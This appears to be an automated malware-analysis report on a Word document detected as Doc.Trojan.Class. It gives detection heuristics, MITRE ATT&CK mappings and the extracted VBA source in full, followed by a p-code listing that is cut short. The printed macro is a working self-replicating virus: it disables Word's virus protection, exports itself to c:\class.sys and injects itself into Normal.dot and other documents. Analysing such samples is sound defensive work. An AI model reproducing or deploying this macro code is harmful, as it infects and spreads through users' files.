MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, indicating a macro-based attack. The AutoClose subroutine attempts to export a component to 'c:\class.sys' and then add it to the Normal.dot template, likely to establish persistence or execute a second-stage payload. The presence of ClamAV detections further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Class-37 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-37
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6993 bytes |
SHA-256: eeacdf01f816aef6f19b01e89c89aca00a7e0ed3761f46f11d95bbc8574ce8fd |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-28
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoClose()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If Date > #5/20/00# Then
End If
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And nt < 3 Then NormalTemplate.VBProject.VBComponents.Item(1).codemodule.deletelines 1
If nt > 3 And ad > 3 Then GoTo out
If nt < 3 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
host.codemodule.AddFromFile ("c:\class.sys")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
.replaceline 1, "Sub AutoClose()"
.replaceline ad - 5, "Sub ViewVBCode()" '44
.replaceline ad - 2, "Sub ToolsMacro()" '47
End With
End If
If ad < 3 Then
Set host = ActiveDocument.VBProject.VBComponents.Item(1)
NormalTemplate.VBProject.VBComponents.Item(1).Export "c:\class.sys"
host.codemodule.AddFromFile ("c:\class.sys")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
.replaceline 1, "Sub AutoOpen()"
.replaceline nt - 5, "Sub ViewVBCode1()"
.replaceline nt - 2, "Sub ToolsMacro1()"
End With
End If
Kill "c:\class.sys"
For Each aTemp In Templates
If LCase(aTemp.Name) = "Normal.dot" Then aTemp.Save
Next aTemp
out:
If nt > 3 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
'123
End Sub
Sub ToolsMacro()
'123
End Sub
' Processing file: /opt/analyzer/scan_staging/65e925086ca24112a2b1d04892e65004.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8340 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' OnError out
' Line #2:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #3:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #4:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #5:
' Ld Date
' LitDate 0x0000 0x0000 0xE740 0x40E1
' Gt
' IfBlock
' Line #6:
' EndIfBlock
' Line #7:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St ad
' Line #8:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St nt
' Line #9:
' Ld nt
' LitDI2 0x0000
' Gt
' Ld nt
' LitDI2 0x0003
' Lt
' And
' If
' BoSImplicit
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' ArgsMemCall deletelines 0x0001
' EndIf
' Line #10:
' Ld nt
' LitDI2 0x0003
' Gt
' Ld ad
' LitDI2 0x0003
' Gt
' And
' If
' BoSImplicit
' GoTo out
' EndIf
' Line #11:
' Ld nt
' LitDI2 0x0003
' Lt
' IfBlock
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' Line #13:
' Ld host
' MemLd New
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemSt New
' Line #14:
' LitStr 0x000C "c:\class.sys"
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0001
' Line #15:
' LitStr 0x000C "c:\class.sys"
' Paren
' Ld host
' MemLd codemodule
' ArgsMemCall AddFromFile 0x0001
' Line #16:
' StartWithExpr
' Ld host
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.